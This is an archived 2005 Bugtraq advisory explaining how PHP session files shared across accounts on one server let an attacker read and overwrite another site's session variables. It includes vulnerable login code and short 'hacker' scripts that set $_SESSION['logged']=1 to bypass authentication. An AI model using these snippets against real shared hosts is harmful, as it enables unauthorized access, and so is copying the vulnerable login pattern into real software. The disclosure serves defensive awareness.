Home page logo
/

bugtraq logo Bugtraq mailing list archives

PHP SESSION MODIFICATION
From: unknow () uw-team org
Date: 16 Sep 2005 10:03:52 -0000

-- == -- == -- == -- == -- == -- == -- == -- == -- == --
Name: PHP SESSION
Version: tested on 3.x and 4.x
Homepage: http://php.net/

Authors: unknow (from uw-team) and adam_i
Date: 16 September 2005
-- == -- == -- == -- == -- == -- == -- == -- == -- == --

In PHP You can define a session variable by this code:

------------------------
start_sesion();
$my_var='foo';
session_register('my_var');
------------------------

This is 'very safe' method to keep secret data, because
data witch was send by get, post or cookie method could
be modified by user.
But... session variable could be also modified!
Only in 'specific environment', but it is possible.

-- == -- == -- == -- == -- == -- == -- == -- == -- == --
                   HOW IT WORKS?
-- == -- == -- == -- == -- == -- == -- == -- == -- == --

PHP save all session variables in file:
/tmp/sess_$id

The variable "$id" is random and it's usually saved in
cookie named 'PHPSESSID' or it is added to URL.
User don't know what kind of variables are declared
in session.

It's very important, that PHP give ONE 'id' per ONE user.
Thats mean that, when you enter site:
www.example.com/account1/
You will have THE SAME 'id' number like on this site:
www.example.com/account2/

So... all data from 'account1' and 'account2' are saved in
THE SAME file: /tmp/sess_$id

Thats mean:
When 'account1' sets variable $name='Been', 'Account2' will
see this variable, and could read, and write to it, because
all data are stored in the same file, and PHP doesn'a know
who is a owner of specified data.


-- == -- == -- == -- == -- == -- == -- == -- == -- == --
                       USAGE
-- == -- == -- == -- == -- == -- == -- == -- == -- == --

You need:
- a victim :P
- www account at the same server like victim

Victim code:
------------------------
session_start();
if (!session_is_registered("logged")) {
$logged=0;
}
if ($login=='s3cr3t') {$logged=1;}
session_register('logged');
if ($_SESSION['logged']==1){ see_my_secret_file(); }
------------------------

Look realy safe!
But we have this code on the same machine, but on the other account:

Hacker code:
------------------------
session_start();
var_export($_SESSION);
------------------------

We must do something like this:

1) enter this site:
http://[victim-host]/[victim]/file.php
2) run this file:
http://[victim-host]/[hacer-account]/hacker.php

We would see something like this on the hacker page:

------------------------
array ( 'logged' => 0, )
------------------------

Now we know that victim use '$logged' variable to recognize us.

Now we must edit hacker file, and write this code:

------------------------
session_start();
$_SESSION['logged']=1;
------------------------

now we run 'hacker.php' file on hacker account and refresh victim page.
Now we are logged in!

Contact:

Author: unknow (from uw-team) and adam_i
Location: Poland
Email: unknow <at> uw-team <dot> org || adam__i <at> o2 <dot>pl
HP: http://www.uw-team.org

-- == -- == -- == -- == -- == -- == -- == -- == -- == --


  By Date           By Thread  

Current thread:
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]
AlienVault